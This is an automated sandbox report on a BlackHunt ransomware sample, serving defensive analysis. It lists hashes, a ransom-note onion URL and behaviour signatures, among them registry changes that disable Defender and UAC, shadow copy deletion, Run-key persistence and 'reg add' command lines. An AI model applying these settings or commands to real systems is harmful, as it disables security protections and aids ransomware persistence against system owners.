Analysis
-
max time kernel
170s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 22:21
Static task
static1
Behavioral task
behavioral1
Sample
01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe
Resource
win10v2004-20231215-en
General
-
Target
01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe
-
Size
707KB
-
MD5
a9acf9ba110697fa1c87186e03bd5c2c
-
SHA1
66f535e98a3ef130f1d3fefe842cd7cebbb81422
-
SHA256
01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b
-
SHA512
6174c53ae1e8c587c53eedad5df079d0a9fa05546749685d4a75ad78c8b0c7856e2e4b1f4c06c7587b695a1367c50e418f969c87440bda26b9ad6f42ea48c03d
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1S8/vnh:6uaTmkZJ+naie5OTamgEoKxLWBXh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 648 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 2176 bcdedit.exe 2380 bcdedit.exe -
Renames multiple (353) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 4356 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\G: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\X: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\V: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\T: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\I: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\N: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\Y: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\U: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\O: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\S: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\Z: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\R: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\A: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\J: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\B: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\W: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\E: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\P: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\K: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\L: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\H: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened (read-only) \??\M: 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 8 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\hijrah-config-umalqura.properties 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\net.properties 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\hu.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\dotnet\swidtag\Microsoft Windows Desktop Runtime - 6.0.25 (x64).swidtag 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\cldr.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\content-types.properties 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\zipfs.jar 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\amd64\#BlackHunt_ReadMe.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\mesa3d.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\giflib.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\jopt-simple.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\#BlackHunt_Private.key 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\javafx\directshow.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\LICENSE 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\#BlackHunt_ReadMe.hta 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy.jar 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\7-zip.chm 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\legal\jdk\jopt-simple.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\cmm\#BlackHunt_ReadMe.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\management\snmp.acl.template 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\gstreamer.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\legal\javafx\#BlackHunt_ReadMe.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\dotnet\LICENSE.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jmc.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\jre\lib\#BlackHunt_Private.key 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_ja.properties 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_it.properties 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\ast.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\javafx\directshow.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\legal\jdk\freebxml.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\ext\meta-index 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jre-1.8\lib\amd64\#BlackHunt_ReadMe.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\lib\jawt.lib 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.hta 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\gu.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\ms.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\bin\#BlackHunt_ReadMe.hta 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\include\#BlackHunt_ReadMe.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\dotnet\ThirdPartyNotices.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\jre\bin\server\#BlackHunt_ReadMe.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\cursors.properties 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\images\cursors\win32_CopyNoDrop32x32.gif 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\README.html 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jdk-1.8\jre\lib\cmm\sRGB.pf 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\Java\jdk-1.8\legal\#BlackHunt_ReadMe.hta 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\Java\jre-1.8\legal\javafx\libffi.md 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\dotnet\host\#BlackHunt_ReadMe.hta 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2236 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 5060 vssadmin.exe 4904 vssadmin.exe 4456 vssadmin.exe 408 vssadmin.exe 2792 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Token: SeRestorePrivilege 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Token: SeBackupPrivilege 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Token: SeTakeOwnershipPrivilege 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Token: SeAuditPrivilege 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Token: SeSecurityPrivilege 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Token: SeIncBasePriorityPrivilege 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Token: SeBackupPrivilege 2968 vssvc.exe Token: SeRestorePrivilege 2968 vssvc.exe Token: SeAuditPrivilege 2968 vssvc.exe Token: SeBackupPrivilege 4236 wbengine.exe Token: SeRestorePrivilege 4236 wbengine.exe Token: SeSecurityPrivilege 4236 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 60 wrote to memory of 1984 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 94 PID 60 wrote to memory of 1984 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 94 PID 60 wrote to memory of 1312 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 97 PID 60 wrote to memory of 1312 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 97 PID 60 wrote to memory of 1272 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 99 PID 60 wrote to memory of 1272 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 99 PID 60 wrote to memory of 4976 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 101 PID 60 wrote to memory of 4976 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 101 PID 60 wrote to memory of 2172 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 102 PID 60 wrote to memory of 2172 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 102 PID 1984 wrote to memory of 1184 1984 cmd.exe 96 PID 1984 wrote to memory of 1184 1984 cmd.exe 96 PID 1312 wrote to memory of 4164 1312 cmd.exe 105 PID 1312 wrote to memory of 4164 1312 cmd.exe 105 PID 1272 wrote to memory of 4228 1272 cmd.exe 106 PID 1272 wrote to memory of 4228 1272 cmd.exe 106 PID 4976 wrote to memory of 1396 4976 cmd.exe 107 PID 4976 wrote to memory of 1396 4976 cmd.exe 107 PID 2172 wrote to memory of 3012 2172 cmd.exe 108 PID 2172 wrote to memory of 3012 2172 cmd.exe 108 PID 60 wrote to memory of 2676 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 110 PID 60 wrote to memory of 2676 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 110 PID 60 wrote to memory of 3104 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 112 PID 60 wrote to memory of 3104 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 112 PID 60 wrote to memory of 3504 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 113 PID 60 wrote to memory of 3504 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 113 PID 60 wrote to memory of 1956 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 116 PID 60 wrote to memory of 1956 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 116 PID 60 wrote to memory of 1544 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 118 PID 60 wrote to memory of 1544 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 118 PID 2676 wrote to memory of 4292 2676 cmd.exe 120 PID 2676 wrote to memory of 4292 2676 cmd.exe 120 PID 3104 wrote to memory of 4280 3104 cmd.exe 121 PID 3104 wrote to memory of 4280 3104 cmd.exe 121 PID 60 wrote to memory of 1012 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 122 PID 60 wrote to memory of 1012 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 122 PID 3504 wrote to memory of 2056 3504 cmd.exe 124 PID 3504 wrote to memory of 2056 3504 cmd.exe 124 PID 1956 wrote to memory of 4852 1956 cmd.exe 125 PID 1956 wrote to memory of 4852 1956 cmd.exe 125 PID 60 wrote to memory of 4856 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 126 PID 60 wrote to memory of 4856 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 126 PID 60 wrote to memory of 2360 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 128 PID 60 wrote to memory of 2360 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 128 PID 60 wrote to memory of 3708 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 131 PID 60 wrote to memory of 3708 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 131 PID 1544 wrote to memory of 1596 1544 cmd.exe 130 PID 60 wrote to memory of 4448 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 129 PID 1544 wrote to memory of 1596 1544 cmd.exe 130 PID 60 wrote to memory of 4448 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 129 PID 1012 wrote to memory of 4820 1012 cmd.exe 135 PID 1012 wrote to memory of 4820 1012 cmd.exe 135 PID 60 wrote to memory of 4348 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 136 PID 60 wrote to memory of 4348 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 136 PID 60 wrote to memory of 4340 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 138 PID 60 wrote to memory of 4340 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 138 PID 60 wrote to memory of 324 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 140 PID 60 wrote to memory of 324 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 140 PID 4856 wrote to memory of 1448 4856 cmd.exe 141 PID 4856 wrote to memory of 1448 4856 cmd.exe 141 PID 60 wrote to memory of 1348 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 143 PID 60 wrote to memory of 1348 60 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe 143 PID 3708 wrote to memory of 3484 3708 cmd.exe 144 PID 3708 wrote to memory of 3484 3708 cmd.exe 144 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe"C:\Users\Admin\AppData\Local\Temp\01a72c95b4deda4c90fd58d3ced7ded1e5afddf700722522028c34e3f819dc3b.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:60 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1184
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:4164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1272 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:4228
-
-
-
